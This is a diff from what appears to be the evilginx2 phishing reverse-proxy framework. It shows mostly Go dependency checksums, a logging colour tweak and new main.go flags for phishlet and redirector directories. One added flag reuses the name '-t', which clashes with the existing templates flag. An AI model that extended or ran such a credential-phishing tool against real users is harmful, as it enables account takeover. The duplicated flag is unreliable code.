golang.org/x/tools v0.0.0-20190907020128-2ca718005c18/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
|
||||
golang.org/x/tools v0.0.0-20190606124116-d0a3d012864b/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc=
|
||||
golang.org/x/tools v0.0.0-20190621195816-6e04913cbbac/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc=
|
||||
golang.org/x/tools v0.0.0-20190628153133-6cdbf07be9d0/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc=
|
||||
golang.org/x/tools v0.0.0-20190816200558-6889da9d5479/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20190911174233-4f2ddba30aff/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191012152004-8de300cfc20a/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191113191852-77e3bb0ad9e7/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191115202509-3a792d9c32b2/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191125144606-a911d9008d1f/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191130070609-6e064ea0cf2d/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
|
||||
golang.org/x/tools v0.0.0-20191216173652-a0e659d51361/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20191227053925-7b8e75db28f4/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200117161641-43d50277825c/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200122220014-bf1340f18c4a/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200204074204-1cc6d1ef6c74/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200207183749-b753a1ba74fa/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200212150539-ea181f53ac56/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200224181240-023911ca70b2/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200227222343-706bc42d1f0d/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
|
||||
golang.org/x/tools v0.0.0-20200304193943-95d2e580d8eb/go.mod h1:o4KQGtdN14AW+yjsvvwRTJJuXz8XRtIHtEnmAXLyFUw=
|
||||
golang.org/x/tools v0.0.0-20200312045724-11d5b4c81c7d/go.mod h1:o4KQGtdN14AW+yjsvvwRTJJuXz8XRtIHtEnmAXLyFUw=
|
||||
golang.org/x/tools v0.0.0-20200331025713-a30bf2db82d4/go.mod h1:Sl4aGygMT6LrqrWclx+PTx3U+LnKx/seiNR+3G19Ar8=
|
||||
golang.org/x/tools v0.0.0-20200501065659-ab2804fb9c9d/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200512131952-2bc93b1c0c88/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200515010526-7d3b6ebf133d/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200618134242-20370b0cb4b2/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20200729194436-6467de6f59a7/go.mod h1:njjCfa9FT2d7l9Bc6FUM5FLjQPp3cFF28FI3qnDFljA=
|
||||
golang.org/x/tools v0.0.0-20200804011535-6c149bb5ef0d/go.mod h1:njjCfa9FT2d7l9Bc6FUM5FLjQPp3cFF28FI3qnDFljA=
|
||||
golang.org/x/tools v0.0.0-20200825202427-b303f430e36d/go.mod h1:njjCfa9FT2d7l9Bc6FUM5FLjQPp3cFF28FI3qnDFljA=
|
||||
golang.org/x/tools v0.0.0-20200904185747-39188db58858/go.mod h1:Cj7w3i3Rnn0Xh82ur9kSqwfTHTeVxaDqrfMjpcNT6bE=
|
||||
golang.org/x/tools v0.0.0-20201110124207-079ba7bd75cd/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20201201161351-ac6f37ff4c2a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20201208233053-a543418bbed2/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20210105154028-b0ab187a4818/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.0.0-20210108195828-e2f9c7f1fc8e/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.1.0/go.mod h1:xkSsbof2nBLbhDlRMhhhyNLN/zl3eTqcnHD5viDpcZ0=
|
||||
golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk=
|
||||
golang.org/x/tools v0.1.6-0.20210726203631-07bc1bf47fb2/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk=
|
||||
golang.org/x/tools v0.1.12 h1:VveCTK38A2rkS8ZqFY25HIDFscX5X9OoEhJd3quQmXU=
|
||||
golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc=
|
||||
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
google.golang.org/api v0.3.1/go.mod h1:6wY9I6uQWHQ8EM57III9mq/AjF+i8G65rmVagqKMtkk=
|
||||
google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE=
|
||||
google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M=
|
||||
google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg=
|
||||
google.golang.org/api v0.9.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg=
|
||||
google.golang.org/api v0.13.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI=
|
||||
google.golang.org/api v0.14.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI=
|
||||
google.golang.org/api v0.15.0/go.mod h1:iLdEw5Ide6rF15KTC1Kkl0iskquN2gFfn9o9XIsbkAI=
|
||||
google.golang.org/api v0.17.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.18.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.19.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.20.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.22.0/go.mod h1:BwFmGc8tA3vsd7r/7kR8DY7iEEGSU04BFxCo5jP/sfE=
|
||||
google.golang.org/api v0.24.0/go.mod h1:lIXQywCXRcnZPGlsd8NbLnOjtAoL6em04bJ9+z0MncE=
|
||||
google.golang.org/api v0.28.0/go.mod h1:lIXQywCXRcnZPGlsd8NbLnOjtAoL6em04bJ9+z0MncE=
|
||||
google.golang.org/api v0.29.0/go.mod h1:Lcubydp8VUV7KeIHD9z2Bys/sm/vGKnG1UHuDBSrHWM=
|
||||
google.golang.org/api v0.30.0/go.mod h1:QGmEvQ87FHZNiUVJkT14jQNYJ4ZJjdRF23ZXz5138Fc=
|
||||
google.golang.org/api v0.35.0/go.mod h1:/XrVsuzM0rZmrsbjJutiuftIzeuTQcEeaYcSk/mQ1dg=
|
||||
google.golang.org/api v0.36.0/go.mod h1:+z5ficQTmoYpPn8LCUNVpK5I7hwkpjbcgqA7I34qYtE=
|
||||
google.golang.org/api v0.40.0/go.mod h1:fYKFpnQN0DsDSKRVRcQSDQNtqWPfM9i+zNPxepjRCQ8=
|
||||
google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM=
|
||||
google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
|
||||
google.golang.org/appengine v1.5.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
|
||||
google.golang.org/appengine v1.6.1/go.mod h1:i06prIuMbXzDqacNJfV5OdTW448YApPu5ww/cMBSeb0=
|
||||
google.golang.org/appengine v1.6.5/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc=
|
||||
google.golang.org/appengine v1.6.6/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc=
|
||||
google.golang.org/appengine v1.6.7/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc=
|
||||
google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc=
|
||||
google.golang.org/genproto v0.0.0-20190307195333-5fe7a883aa19/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190418145605-e7d98fc518a7/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190425155659-357c62f0e4bb/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190502173448-54afdca5d873/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE=
|
||||
google.golang.org/genproto v0.0.0-20190801165951-fa694d86fc64/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc=
|
||||
google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc=
|
||||
google.golang.org/genproto v0.0.0-20190911173649-1774047e7e51/go.mod h1:IbNlFCBrqXvoKpeg0TB2l7cyZUmoaFKYIwrEpbDKLA8=
|
||||
google.golang.org/genproto v0.0.0-20191108220845-16a3f7862a1a/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20191115194625-c23dd37a84c9/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20191216164720-4f79533eabd1/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20191230161307-f3c370f40bfb/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20200115191322-ca5a22157cba/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20200122232147-0452cf42e150/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc=
|
||||
google.golang.org/genproto v0.0.0-20200204135345-fa8e72b47b90/go.mod h1:GmwEX6Z4W5gMy59cAlVYjN9JhxgbQH6Gn+gFDQe2lzA=
|
||||
google.golang.org/genproto v0.0.0-20200212174721-66ed5ce911ce/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200224152610-e50cd9704f63/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200228133532-8c2c7df3a383/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200312145019-da6875a35672/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200331122359-1ee6d9798940/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200511104702-f5ebc3bea380/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c=
|
||||
google.golang.org/genproto v0.0.0-20200515170657-fc4c6c6a6587/go.mod h1:YsZOwe1myG/8QRHRsmBRE1LrgQY60beZKjly0O1fX9U=
|
||||
google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo=
|
||||
google.golang.org/genproto v0.0.0-20200618031413-b414f8b61790/go.mod h1:jDfRM7FcilCzHH/e9qn6dsT145K34l5v+OpcnNgKAAA=
|
||||
google.golang.org/genproto v0.0.0-20200729003335-053ba62fc06f/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20200804131852-c06518451d9c/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20200825200019-8632dd797987/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20200904004341-0bd0a958aa1d/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201109203340-2640f1f9cdfb/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201201144952-b05cb90ed32e/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201210142538-e3217bee35cc/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20201214200347-8c77b98c765d/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20210108203827-ffc7fda8c3d7/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/genproto v0.0.0-20210226172003-ab064af71705/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no=
|
||||
google.golang.org/grpc v1.17.0/go.mod h1:6QZJwpn2B+Zp71q/5VxRsJ6NXXVCE5NRUHRo+f3cWCs=
|
||||
google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
|
||||
google.golang.org/grpc v1.19.1/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c=
|
||||
google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38=
|
||||
google.golang.org/grpc v1.21.0/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM=
|
||||
google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM=
|
||||
google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg=
|
||||
google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY=
|
||||
google.golang.org/grpc v1.26.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
|
||||
google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
|
||||
google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk=
|
||||
google.golang.org/grpc v1.28.0/go.mod h1:rpkK4SK4GF4Ach/+MFLZUBavHOvF2JJB5uozKKal+60=
|
||||
google.golang.org/grpc v1.29.1/go.mod h1:itym6AZVZYACWQqET3MqgPpjcuV5QH3BxFS3IjizoKk=
|
||||
google.golang.org/grpc v1.30.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
|
||||
google.golang.org/grpc v1.31.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
|
||||
google.golang.org/grpc v1.31.1/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
|
||||
google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc=
|
||||
google.golang.org/grpc v1.34.0/go.mod h1:WotjhfgOW/POjDeRt8vscBtXq+2VjORFy659qA51WJ8=
|
||||
google.golang.org/grpc v1.35.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU=
|
||||
google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8=
|
||||
google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
|
||||
google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM=
|
||||
google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE=
|
||||
google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo=
|
||||
google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
|
||||
google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
|
||||
google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
|
||||
google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4=
|
||||
google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c=
|
||||
gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw=
|
||||
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
|
||||
gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127 h1:qIbj1fsPNlZgppZ+VLlY7N33q108Sa+fhmuc+sWQYwY=
|
||||
gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
|
||||
gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI=
|
||||
gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys=
|
||||
gopkg.in/h2non/gock.v1 v1.0.15/go.mod h1:sX4zAkdYX1TRGJ2JY156cFspQn4yRWn6p9EMdODlynE=
|
||||
gopkg.in/ini.v1 v1.42.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k=
|
||||
gopkg.in/ini.v1 v1.44.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k=
|
||||
gopkg.in/ini.v1 v1.66.4 h1:SsAcf+mM7mRZo2nJNGt8mZCjG8ZRaNGMURJw7BsIST4=
|
||||
gopkg.in/ini.v1 v1.66.4/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k=
|
||||
gopkg.in/ns1/ns1-go.v2 v2.0.0-20190730140822-b51389932cbc/go.mod h1:VV+3haRsgDiVLxyifmMBrBIuCWFBPYKbRssXB9z67Hw=
|
||||
gopkg.in/resty.v1 v1.9.1/go.mod h1:vo52Hzryw9PnPHcJfPsBiFW62XhNx5OczbV9y+IMpgc=
|
||||
gopkg.in/resty.v1 v1.12.0/go.mod h1:mDo4pnntr5jdWRML875a/NmxYqAlA73dVijT2AXvQQo=
|
||||
@ -401,11 +735,22 @@ gopkg.in/square/go-jose.v2 v2.3.1 h1:SK5KegNXmKmqE342YYN2qPHEnUYeoMiXXl1poUlI+o4
|
||||
gopkg.in/square/go-jose.v2 v2.3.1/go.mod h1:M9dMgbHiYLoDGQrXy7OpJDJWiKiU//h+vD76mk0e1AI=
|
||||
gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7/go.mod h1:dt/ZhP58zS4L8KSrWDmTeBkI65Dw0HsyUHuEVlX15mw=
|
||||
gopkg.in/yaml.v2 v2.0.0-20170812160011-eb3733d160e7/go.mod h1:JAlM8MvJe8wmxCU4Bli9HhUf9+ttbYbLASfIpnQbh74=
|
||||
gopkg.in/yaml.v2 v2.2.1 h1:mUhvW9EsL+naU5Q3cakzfE91YhliOondGd6ZrsDBHQE=
|
||||
gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
|
||||
gopkg.in/yaml.v2 v2.2.2 h1:ZCJp+EgiOT7lHqUV2J862kp8Qj64Jo6az82+3Td9dZw=
|
||||
gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
|
||||
gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
|
||||
gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
|
||||
gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
|
||||
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
|
||||
gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo=
|
||||
gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
|
||||
honnef.co/go/tools v0.0.0-20180728063816-88497007e858/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.0-20190418001031-e561f6794a2a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.1-2019.2.3/go.mod h1:a3bituU0lyd329TUQxRnasdCoJDkEUEAqEt0JzvZhAg=
|
||||
honnef.co/go/tools v0.0.1-2020.1.3/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k=
|
||||
honnef.co/go/tools v0.0.1-2020.1.4/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k=
|
||||
rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8=
|
||||
rsc.io/quote/v3 v3.1.0/go.mod h1:yEA65RcK8LyAZtP9Kv3t0HmxON59tX3rD+tICJqUlj0=
|
||||
rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA=
|
||||
|
@ -144,7 +144,7 @@ func format_msg(lvl int, format string, args ...interface{}) string {
|
||||
//msg = color.New(color.Reset, color.FgHiBlue)
|
||||
msg = color.New(color.Reset)
|
||||
case WARNING:
|
||||
sign = color.New(color.FgBlack, color.BgYellow)
|
||||
sign = color.New(color.FgHiYellow, color.BgBlack)
|
||||
//msg = color.New(color.Reset, color.FgYellow)
|
||||
msg = color.New(color.Reset)
|
||||
case ERROR:
|
||||
|
53
main.go
53
main.go
@ -2,6 +2,7 @@ package main
|
||||
|
||||
import (
|
||||
"flag"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"os/user"
|
||||
@ -11,13 +12,16 @@ import (
|
||||
"github.com/kgretzky/evilginx2/core"
|
||||
"github.com/kgretzky/evilginx2/database"
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
|
||||
"github.com/fatih/color"
|
||||
)
|
||||
|
||||
var phishlets_dir = flag.String("p", "", "Phishlets directory path")
|
||||
var templates_dir = flag.String("t", "", "HTML templates directory path")
|
||||
var redirectors_dir = flag.String("t", "", "HTML redirector pages directory path")
|
||||
var debug_log = flag.Bool("debug", false, "Enable debug output")
|
||||
var developer_mode = flag.Bool("developer", false, "Enable developer mode (generates self-signed certificates for all hostnames)")
|
